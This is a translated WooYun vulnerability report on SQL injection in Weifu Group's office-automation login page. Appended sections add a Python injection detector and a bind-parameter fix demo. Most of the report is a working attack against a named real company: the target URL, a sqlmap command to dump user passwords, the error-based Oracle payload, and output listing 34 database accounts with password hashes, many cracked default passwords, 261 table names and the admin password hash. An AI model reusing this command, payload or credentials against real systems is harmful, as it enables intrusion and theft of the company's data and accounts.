
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0151795

Title: SQL injection in the Weifu Group collaborative office and management platform (DBA privileges / passwords of 34 system administrators leaked / 21 databases / 261 tables / admin password leaked)

Affected vendor: 威孚集团 (Weifu Group)

Author: 路人甲

Submitted: 2015-11-04 16:19

Fix time: 2015-12-19 16:20

Public disclosure: 2015-12-19 16:20

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-04: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-12-19: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Wuxi Weifu High-Technology Group Co., Ltd. is a well-known domestic manufacturer of automotive components and one of China's top 500 enterprises. Over more than half a century of development it has grown to 10 wholly-owned and controlled subsidiaries and 2 associated companies (Sino-foreign joint ventures), with total assets of nearly 15 billion yuan, and it is a well-performing A- and B-share listed company. For more than 30 consecutive years the company's main technical and economic indicators have led the domestic industry, and it has received a series of honours such as "Top 100 Chinese Automotive Parts Enterprises" and "Top 100 Chinese Machinery Industry Enterprises".
Amid the rapid growth of the automotive industry, Weifu seized the opportunity, pursued technological innovation and product restructuring, and expanded from a single fuel-injection-system product line into three segments: fuel injection systems, exhaust after-treatment systems and automotive air-intake systems. This formed a competitive core automotive component industry chain and completed a product upgrade and strategic business transformation. Its product range covers China III, China IV and stricter emission standards, supplies the major domestic automobile and diesel engine manufacturers, and is exported to the Americas, the Middle East and Southeast Asia.
The company combines a "National Enterprise Technology Center", a "Postdoctoral Research Workstation" and a "National High-Tech R&D Programme Industrialisation Base", employs more than 7,000 people, develops its management, technical and highly-skilled talent pools in parallel, and, in a spirit of innovation and pragmatism, works continuously to strengthen its technological innovation and R&D capabilities.
The company is building the lean-oriented Weifu Production System (WPS) to comprehensively raise its manufacturing, quality-assurance, cost-control and delivery capabilities: satisfying customers through quality, cost and delivery, satisfying employees through stable work and a sense of belonging, and creating sustained economic and social benefits.
With the completion of the Weifu Industrial Park, the company is entering a new stage of development. Drawing on the technological, manufacturing, procurement, marketing and management strengths accumulated over 50 years, Weifu's people are, with an international outlook, creatively building on these resources, meeting customers' high standards with high-quality products and services, and, with an outstanding workforce, striving toward the new strategic goal of becoming "the domestic leader in core automotive (power engineering) components".

Detailed description:

URL: http://oa.weifu.com.cn/j_acegi_security_check

python sqlmap.py -u "http://oa.weifu.com.cn/j_acegi_security_check" --form -p j_username --technique=E --random-agent --batch -D WEIFU -T LIGHT_USER -C USERID,PASSWORD,EMAIL --dump

Proof of vulnerability:

---
Parameter: j_username (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: rndData=180282731371543&encData=zdnI&isusb=1&isIP=0&ip=120.236.174.205&isdx=0&needauthcode=0&sendpass=0&j_username=EJdT') AND 8057=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8057=8057) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND ('nTTm'='nTTm&rememberme=1&uname=nZyv&j_password=&dynamicpass=rJwM
---
web application technology: JSP
back-end DBMS: Oracle
current user: 'OAWEIFU'
current user is DBA: True
database management system users [34]:
[*] ANONYMOUS
[*] APEX_030200
[*] APEX_PUBLIC_USER
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OAINTERFACE
[*] OAWEIFU
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDDATA
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] OWBSYS_AUDIT
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WEIFU
[*] WMSYS
[*] XDB
[*] XS$NULL
database management system users password hashes:
[*] _NEXT_USER [1]:
password hash: NULL
[*] ADM_PARALLEL_EXECUTE_TASK [1]:
password hash: NULL
[*] ANONYMOUS [1]:
password hash: anonymous
[*] APEX_030200 [1]:
password hash: A0A4E8B39539FE33
[*] APEX_ADMINISTRATOR_ROLE [1]:
password hash: NULL
[*] APEX_PUBLIC_USER [1]:
password hash: C6BBF8681ABCED93
[*] APPQOSSYS [1]:
password hash: 519D632B7EE7F63A
clear-text password: APPQOSSYS
[*] AQ_ADMINISTRATOR_ROLE [1]:
password hash: NULL
[*] AQ_USER_ROLE [1]:
password hash: NULL
[*] AUTHENTICATEDUSER [1]:
password hash: NULL
[*] CONNECT [1]:
password hash: NULL
[*] CSW_USR_ROLE [1]:
password hash: F79FD2B778DEA3AA
clear-text password: CSW_USR_ROLE
[*] CTXAPP [1]:
password hash: NULL
[*] CTXSYS [1]:
password hash: 94FAF33AEB954129
[*] CWM_USER [1]:
password hash: NULL
[*] DATAPUMP_EXP_FULL_DATABASE [1]:
password hash: NULL
[*] DATAPUMP_IMP_FULL_DATABASE [1]:
password hash: NULL
[*] DBA [1]:
password hash: NULL
[*] DBFS_ROLE [1]:
password hash: NULL
[*] DBSNMP [1]:
password hash: E6E9AD214F9DEFFE
[*] DELETE_CATALOG_ROLE [1]:
password hash: NULL
[*] DIP [1]:
password hash: CE4A36B8E06CA59C
clear-text password: DIP
[*] EJBCLIENT [1]:
password hash: NULL
[*] EWEAVER [1]:
password hash: 0FDCD99F46209C3C
clear-text password: EWEAVER
[*] EXECUTE_CATALOG_ROLE [1]:
password hash: NULL
[*] EXFSYS [1]:
password hash: 33C758A8E388DEE5
[*] EXP_FULL_DATABASE [1]:
password hash: NULL
[*] FLOWS_FILES [1]:
password hash: F1DE72E8D6A89019
[*] GATHER_SYSTEM_STATISTICS [1]:
password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
password hash: GLOBAL
[*] HS_ADMIN_EXECUTE_ROLE [1]:
password hash: NULL
[*] HS_ADMIN_ROLE [1]:
password hash: NULL
[*] HS_ADMIN_SELECT_ROLE [1]:
password hash: NULL
[*] IMP_FULL_DATABASE [1]:
password hash: NULL
[*] JAVA_ADMIN [1]:
password hash: NULL
[*] JAVA_DEPLOY [1]:
password hash: NULL
[*] JAVADEBUGPRIV [1]:
password hash: NULL
[*] JAVAIDPRIV [1]:
password hash: NULL
[*] JAVASYSPRIV [1]:
password hash: NULL
[*] JAVAUSERPRIV [1]:
password hash: NULL
[*] JMXSERVER [1]:
password hash: NULL
[*] LOGSTDBY_ADMINISTRATOR [1]:
password hash: NULL
[*] MDDATA [1]:
password hash: DF02A496267DEE66
clear-text password: MDDATA
[*] MDSYS [1]:
password hash: 72979A94BAD2AF80
clear-text password: MDSYS
[*] MGMT_USER [1]:
password hash: NULL
[*] MGMT_VIEW [1]:
password hash: AD3B943F46968527
[*] OAINTERFACE [1]:
password hash: D00EC33BDC9BC155
clear-text password: OAINTERFACE
[*] OAWEIFU [1]:
password hash: 59462C5724649BB2
[*] OEM_ADVISOR [1]:
password hash: NULL
[*] OEM_MONITOR [1]:
password hash: NULL
[*] OLAP_DBA [1]:
password hash: NULL
[*] OLAP_USER [1]:
password hash: NULL
[*] OLAP_XS_ADMIN [1]:
password hash: NULL
[*] OLAPI_TRACE_USER [1]:
password hash: NULL
[*] OLAPSYS [1]:
password hash: 4AC23CC3B15E2208
[*] ORACLE_OCM [1]:
password hash: 5A2E026A9157958C
[*] ORDADMIN [1]:
password hash: NULL
[*] ORDDATA [1]:
password hash: A93EC937FCD1DC2A
clear-text password: ORDDATA
[*] ORDPLUGINS [1]:
password hash: 88A2B2C183431F00
clear-text password: ORDPLUGINS
[*] ORDSYS [1]:
password hash: 7EFA02EC7EA6B86F
clear-text password: ORDSYS
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
clear-text password: OUTLN
[*] OWB$CLIENT [1]:
password hash: 13D492A4459DFE0D
[*] OWB_DESIGNCENTER_VIEW [1]:
password hash: NULL
[*] OWB_USER [1]:
password hash: NULL
[*] OWBSYS [1]:
password hash: 610A3C38F301776F
clear-text password: OWBSYS
[*] OWBSYS_AUDIT [1]:
password hash: FD8C3D14F6B60015
clear-text password: OWBSYS_AUDIT
[*] PUBLIC [1]:
password hash: NULL
[*] RECOVERY_CATALOG_OWNER [1]:
password hash: NULL
[*] RESOURCE [1]:
password hash: NULL
[*] SCHEDULER_ADMIN [1]:
password hash: NULL
[*] SCOTT [1]:
password hash: F894844C34402B67
clear-text password: TIGER
[*] SELECT_CATALOG_ROLE [1]:
password hash: NULL
[*] SI_INFORMTN_SCHEMA [1]:
password hash: 84B8CBCA4D477FA3
clear-text password: SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN [1]:
password hash: 093913703800E437
clear-text password: SPATIAL_CSW_ADMIN
[*] SPATIAL_CSW_ADMIN_USR [1]:
password hash: 1B290858DD14107E
clear-text password: SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN [1]:
password hash: NULL
[*] SPATIAL_WFS_ADMIN_USR [1]:
password hash: 7117215D6BEE6E82
clear-text password: SPATIAL_WFS_ADMIN_USR
[*] SYS [1]:
password hash: 8F496E0A85640576
[*] SYSMAN [1]:
password hash: 17F2F68A0543EC8B
[*] SYSTEM [1]:
password hash: E7992808912AB2CF
[*] WEIFU [1]:
password hash: D1882C3ECCE46E8E
clear-text password: WEIFU
[*] WFS_USR_ROLE [1]:
password hash: 094C14AA84362687
clear-text password: WFS_USR_ROLE
[*] WM_ADMIN_ROLE [1]:
password hash: NULL
[*] WMSYS [1]:
password hash: 7C9BA362F8314299
clear-text password: WMSYS
[*] XDB [1]:
password hash: 88D8364765FCE6AF
clear-text password: CHANGE_ON_INSTALL
[*] XDB_SET_INVOKER [1]:
password hash: NULL
[*] XDB_WEBSERVICES [1]:
password hash: NULL
[*] XDB_WEBSERVICES_OVER_HTTP [1]:
password hash: NULL
[*] XDB_WEBSERVICES_WITH_PUBLIC [1]:
password hash: NULL
[*] XDBADMIN [1]:
password hash: NULL
[*] XS$NULL [1]:
password hash: DC4FCC8CB69A6733
available databases [21]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OAWEIFU
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WEIFU
[*] WMSYS
[*] XDB
Database: WEIFU
[261 tables]
+------------------------------+
| MODULE |
| ACCOUNTSETTING |
| ALBUM |
| ATTACH |
| ATTENDANCE |
| BLOG_APP |
| BLOG_APPDATAS |
| BLOG_APPITEM |
| BLOG_ATTENTION |
| BLOG_CANCELATTENTION |
| BLOG_DISCUSS |
| BLOG_READ |
| BLOG_REMIND |
| BLOG_REPLY |
| BLOG_REPORTTEMP |
| BLOG_SETTING |
| BLOG_SHARE |
| BLOG_SYSSETTING |
| BLOG_TEMPCONDITION |
| BLOG_VISIT |
| CALENDARSETTING |
| CARDCOMBINATION |
| CARDCOMBINATIONDETAIL |
| CATEGORY |
| CATEGORYLINK |
| CHANGELOG |
| CHANGELOGDETAIL |
| COMBINEFIELD |
| CONTEMPFIELD |
| CONTEMPLATE |
| CONTEMPLATESTATE |
| COWORKADDFUN |
| COWORKBASE |
| COWORKLOG |
| COWORKPERMISSION |
| COWORKREPLYBASE |
| COWORKRULE |
| COWORKSET |
| COWORKTAG |
| COWORKTAGLINK |
| CPMS_COMMENT |
| CPMS_DOCLINK |
| CPMS_DOCTYPELINK |
| CPMS_FLOWLINK |
| CPMS_PROJECT |
| CPMS_TASK |
| CPMS_TASKLINK |
| CPMS_TASKRESOURCE |
| CPMS_TASKTEMPLATE |
| CPMS_WBSTEMPLATE |
| CUSTOMACTION |
| CUSTOMACTIONDETAIL |
| DELOBJ |
| DOCATTACH |
| DOCBASE |
| DOCBASEPUSH |
| DOCEXCLUSION |
| DOCTRANSFERLOG |
| DSENTITY |
| DSMETA |
| DYNAMICFORMACTION |
| DYNAMICPASS |
| DYNAMICPASSRULE |
| EDO_ASSIGNMENT |
| EDO_BASELINE |
| EDO_CALENDAR |
| EDO_PREDECESSORLINK |
| EDO_PROJECT |
| EDO_RESOURCE |
| EDO_TASK |
| EDO_WEEKDAY |
| EMAILPORTLET |
| EMAILSETINFO |
| EMAILTYPE |
| ESERVERINFO |
| EXCELOPT |
| EXPORT |
| EXPORTDETAIL |
| EXPORTFREE |
| EXTFIELDINFO |
| EXTFIELDSET |
| FAVLIST |
| FORMBASE |
| FORMFIELD |
| FORMINFO |
| FORMLAYOUT |
| FORMLAYOUTFIELD |
| FORMLINK |
| GETEMAILS |
| GROUPFIELD |
| GROUPFIELDDETAIL |
| HOLIDAYSINFO |
| HOMEPAGES |
| HRMMESSAGERACCOUNT |
| HRMMESSAGERCONTACT |
| HRMMESSAGERGROUP |
| HRMMESSAGERGROUPUSERS |
| HRMMESSAGERMSG |
| HRMMESSAGERTEMPMSG |
| HTMLSIGNATURE |
| HUMRES |
| HUMRESCUSTOMIZE |
| IMGFILE |
| IMGINFO |
| INDAGATECONTENT |
| INDAGATEFORMSET |
| INDAGATEOPTION |
| INDAGATEREMARK |
| INTERFACECONFIGDETAIL |
| INTERFACELOG |
| INTERFACEMETA |
| INTERFACEOBJLINK |
| IPSET |
| JOBREMIND |
| JREMINDER |
| KEYINFO |
| KEYWORDS |
| LABEL |
| LABELCUSTOM |
| LABELDICTORY |
| LICS |
| LIGHT_BOOKMARK |
| LIGHT_NOTE |
| LIGHT_NOTE_REF |
| LIGHT_PORTAL |
| LIGHT_PORTAL_TAB |
| LIGHT_PORTLET |
| LIGHT_PORTLET_CONFIG |
| LIGHT_PORTLET_PREFERENCES |
| LIGHT_PORTLET_REF |
| LIGHT_PORTLET_STYLE |
| LIGHT_ROLE |
| LIGHT_TODO |
| LIGHT_USER |
| LIGHT_USER_ROLE |
| LOG |
| LOGINUPPASS |
| MENU |
| MENUORG |
| MESSAGEURL |
| NODEINFO |
| NODEINFOFREE |
| NODEREMIND |
| NOTIFY |
| NOTIFYDEFINE |
| NOTIFYRECEIVERLINK |
| ORGUNIT |
| ORGUNITLINK |
| ORGUNITTYPE |
| OTHEROPTIONVALUE |
| OUTTERSYS |
| OUTTERSYSDETAIL |
| OUTTER_PARAMS |
| PAGEMENU |
| PASSEXPIRYDATE |
| PERMISSIONBATCHACTION |
| PERMISSIONBATCHACTIONDETAIL |
| PERMISSIONBATCHACTIONGROUP |
| PERMISSIONDETAIL |
| PERMISSIONRULE |
| PERSONALSET |
| PERSONALSIGNATURE |
| PHOTO |
| PORTALORG |
| PORTLETOBJECTCONFIG |
| REFOBJ |
| REFOBJLINK |
| RELATIONSET |
| REMARK |
| REPEATPATTERN |
| REPORTDEF |
| REPORTFIELD |
| REPORTSEARCHFIELD |
| REQUESTBASE |
| REQUESTFLOWPATH |
| REQUESTINFO |
| REQUESTLOG |
| REQUESTOPERATORMARK |
| REQUESTOPERATORS |
| REQUESTOPTRULE |
| REQUESTSTATUS |
| REQUESTSTEP |
| SCHEDULESET |
| SEARCHCUSTOMIZE |
| SEARCHCUSTOMIZEOPTION |
| SELECTITEM |
| SELECTITEMTYPE |
| SENDEMAIL |
| SENDMSG |
| SEQUENCE |
| SEQUENCELINK |
| SETITEM |
| SETITEMTYPE |
| SHORTCUT |
| SHORTCUT_CUSTOMDATA |
| SKIN |
| SMSHISTORY |
| SMSTMP |
| SQLUPGRADE |
| STAMPINFO |
| STATIONINFO |
| STATIONLEVELLINK |
| STATIONLINK |
| SUBPROCESSSET |
| SUBPROCESSSETCONDITIONDETAIL |
| SUBPROCESSSETDETAIL |
| SURVEYATTRIBUTE |
| SURVEYCONFIG |
| SURVEYRECORD |
| SYCLOG |
| SYSGROUP |
| SYSGROUPHUMRES |
| SYSPERMRESLINK |
| SYSPERMS |
| SYSRESOURCE |
| SYSROLE |
| SYSROLEPERMLINK |
| SYSUSER |
| SYSUSERROLELINK |
| TASKCONDITION |
| TASKLOG |
| TASKMODEL |
| TEMPLATEVIEWER |
| TIMESTAMPS |
| TODOITEMS |
| TREEVIEWERINFO |
| UF_COLLABORATION |
| UF_COLLCOMUNICATION |
| UF_COWORKTYPE |
| UF_LOGNOTE |
| UF_MAINCOWORK |
| UF_REPLYCOWORK |
| UF_SBGZHTSQB |
| UF_SLIDER_PORTLET |
| UF_TASK_ALLOT |
| UF_TASK_TEMPLATE |
| UF_TEST |
| UF_UF_TASKEXECUTEMB_SUB |
| UF_WFMS_DXGZDH |
| UF_WFMS_SZGZSJDH |
| UF_WF_DZGJCGSQD |
| UF_WF_SZGJCGSQD |
| UF_WORK_INNERMESSAGE |
| UF_ZYSBJBSP |
| USERKEY |
| VERSIONACTIVEPOLICY |
| VERSIONINFO |
| WARNCONFIG |
| WEBMENU |
| WEBMENUREF |
| WEBSKIN |
| WORDMODULE |
| WORKFLOWACCREDIT |
| WORKFLOWACTING |
| WORKFLOWDOCTYPE |
| WORKFLOWINFO |
| WORKFLOWNODESTYLE |
| WORKFLOWUSECOUNT |
| WORKFLOWVERSION |
| WORKFLOWVERSIONLOG |
| XSHT_DJ |
+------------------------------+
Database: WEIFU
Table: USERKEY
[3 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| ID | VARCHAR2 |
| KEYNAME | VARCHAR2 |
| KEYVALUE | VARCHAR2 |
+----------+----------+
columns LIKE 'PASSWORD' were found in the following databases:
Database: WEIFU
Table: LIGHT_USER
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| PASSWORD | VARCHAR2 |
+----------+----------+
Database: WEIFU
Table: DSENTITY
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| PASSWORD | VARCHAR2 |
+----------+----------+
Database: WEIFU
Table: LIGHT_USER
[1 entry]
+----------------------------------+
| PASSWORD |
+----------------------------------+
| 0f0e1f751500e7a680388b05639d1624 |
+----------------------------------+
Database: WEIFU
Table: LIGHT_USER
[6 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| EMAIL | VARCHAR2 |
| FIRSTNAME | VARCHAR2 |
| LASTNAME | VARCHAR2 |
| MIDDLENAME | VARCHAR2 |
| PASSWORD | VARCHAR2 |
| USERID | VARCHAR2 |
+------------+----------+
Database: WEIFU
Table: LIGHT_USER
[1 entry]
+--------+----------------------------------+----------------------+
| USERID | PASSWORD | EMAIL |
+--------+----------------------------------+----------------------+
| admin | 0f0e1f751500e7a680388b05639d1624 | [email protected] |
+--------+----------------------------------+----------------------+
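The injected j_username value shown in the proof has a recognisable shape: a quote-and-parenthesis breakout followed by AND, an XMLType() call wrapped around CHR()-concatenated markers, a SELECT ... FROM DUAL subquery, and a closing ('x'='x tautology. The following is an added defensive example, not code from the original report or from the affected platform: it decodes captured login POST bodies the way the endpoint would, extracts j_username, and scores the value against those markers so that a log review or a request filter can surface attempts of this kind. The sample bodies are constructed; the second reproduces the report's payload shape with '+' standing for spaces, and the third is a legitimate name containing an apostrophe that must not be flagged.

```python
"""Flag Oracle error-based SQL injection attempts in captured login POST bodies.

Added defensive example for this report; it is not code from the original
post or from the affected platform.
"""
import re
from urllib.parse import parse_qs

# Each rule: (name, compiled pattern, weight). Weights add up per request; a
# single strong marker (XMLType) is enough on its own, weaker ones need company.
RULES = [
    ("xmltype", re.compile(r"\bXMLType\s*\(", re.I), 3),
    ("chr_concat", re.compile(r"\bCHR\s*\(\s*\d+\s*\)\s*\|\|", re.I), 2),
    ("from_dual", re.compile(r"\bFROM\s+DUAL\b", re.I), 2),
    ("quote_paren_boolean", re.compile(r"['\"]\)\s*(?:AND|OR)\b", re.I), 2),
    ("tautology", re.compile(r"\(\s*'(\w*)'\s*=\s*'\1\b", re.I), 2),
    ("select_from", re.compile(r"\bSELECT\b.+\bFROM\b", re.I), 1),
]
THRESHOLD = 3

# Constructed sample request bodies: a benign login, the report's payload shape
# ('+' for spaces), and a legitimate name with an apostrophe.
SAMPLE_BODIES = [
    "j_username=zhangsan&j_password=secret&rememberme=1",
    "j_username=EJdT')+AND+8057=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)"
    "||(SELECT+(CASE+WHEN+(8057=8057)+THEN+1+ELSE+0+END)+FROM+DUAL)||CHR(62)))"
    "+FROM+DUAL)+AND+('nTTm'='nTTm&rememberme=1&j_password=",
    "j_username=o'brien&j_password=x",
]


def analyze_body(body, field="j_username"):
    """Return the decoded field value, matched rule names, score and verdict."""
    fields = parse_qs(body, keep_blank_values=True)
    value = fields.get(field, [""])[0]
    matched = [name for name, pattern, _ in RULES if pattern.search(value)]
    score = sum(weight for name, _, weight in RULES if name in matched)
    return {"value": value, "rules": matched, "score": score,
            "suspicious": score >= THRESHOLD}


def scan(bodies):
    """Indexes of request bodies that score at or above the threshold."""
    return [i for i, body in enumerate(bodies) if analyze_body(body)["suspicious"]]


if __name__ == "__main__":
    for i, body in enumerate(SAMPLE_BODIES):
        result = analyze_body(body)
        print(i, "SUSPICIOUS" if result["suspicious"] else "ok", result["rules"])
```

The weighted scoring is deliberate: a lone apostrophe or the word SELECT in a username is not evidence, whereas XMLType() has no business in a login field, so it carries the threshold by itself. Such a filter is a detection aid and a speed bump, not the fix; the fix belongs in how the application builds its query.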

Fix recommendation:

Add input filtering.
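Filtering alone is brittle; the durable fix for an error-based injection in a login lookup is to stop splicing the request value into the SQL text and pass it as a bind parameter instead. The following added example (not code from the original report or from the affected platform) puts the two patterns side by side. The real application is JSP on Oracle; sqlite3 stands in here so that the example runs offline, the table and column names mirror the dumped LIGHT_USER table, and the stored row is a constructed placeholder. It feeds each lookup the report's exact j_username payload and a legitimate name with an apostrophe: the concatenated query hands both to the SQL parser and returns a database error (the very error channel error-based extraction relies on, and a broken login for the honest user), while the bind-parameter query treats both as plain string values and simply finds no matching user. Independently of the injection, the hash dump also shows Oracle built-in accounts such as SCOTT and OUTLN still on their default passwords; that is a separate hardening item, and Oracle's DBA_USERS_WITH_DEFPWD view lists such accounts.

```python
"""Concatenated vs. bind-parameter login lookup.

Added example for this report, not code from the affected platform. sqlite3
stands in for Oracle so the example runs offline; table/column names mirror
the dumped LIGHT_USER table and the stored values are constructed placeholders.
"""
import sqlite3

# The j_username value from the report's proof section, verbatim.
INJECTED_USERNAME = (
    "EJdT') AND 8057=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)"
    "||CHR(98)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8057=8057) THEN 1 ELSE 0 END)"
    " FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(107)||CHR(113)||CHR(62)))"
    " FROM DUAL) AND ('nTTm'='nTTm"
)


def make_db():
    """In-memory stand-in for WEIFU.LIGHT_USER with one constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE LIGHT_USER (USERID TEXT PRIMARY KEY, PASSWORD TEXT, EMAIL TEXT)"
    )
    conn.execute(
        "INSERT INTO LIGHT_USER VALUES (?, ?, ?)",
        ("admin", "constructed-password-hash", "admin@example.invalid"),
    )
    return conn


def lookup_concatenated(conn, username):
    """Vulnerable pattern: the request value becomes part of the SQL text."""
    sql = "SELECT USERID, EMAIL FROM LIGHT_USER WHERE (USERID = '" + username + "')"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username):
    """Hardened pattern: the value travels as a bind parameter, never as SQL."""
    sql = "SELECT USERID, EMAIL FROM LIGHT_USER WHERE (USERID = ?)"
    return conn.execute(sql, (username,)).fetchall()


def login_lookup(conn, username, parameterized):
    """Run one lookup and report the row count plus any database error text."""
    lookup = lookup_parameterized if parameterized else lookup_concatenated
    try:
        return {"rows": len(lookup(conn, username)), "error": None}
    except sqlite3.Error as exc:
        # With concatenation the engine's own error text reaches the caller;
        # that error channel is exactly what error-based extraction relies on.
        return {"rows": 0, "error": str(exc)}


if __name__ == "__main__":
    db = make_db()
    for name in ("admin", "o'brien", INJECTED_USERNAME):
        for param in (False, True):
            print("bind  " if param else "concat", repr(name[:24]),
                  login_lookup(db, name, param))
```

In the JSP application itself the same change is a JDBC PreparedStatement with ? bind variables (or the equivalent parameter binding of whatever data-access layer builds the j_username lookup); the statement text then never varies with user input, and the database error messages that error-based injection depends on have nothing to report.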

Copyright notice: when republishing, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined.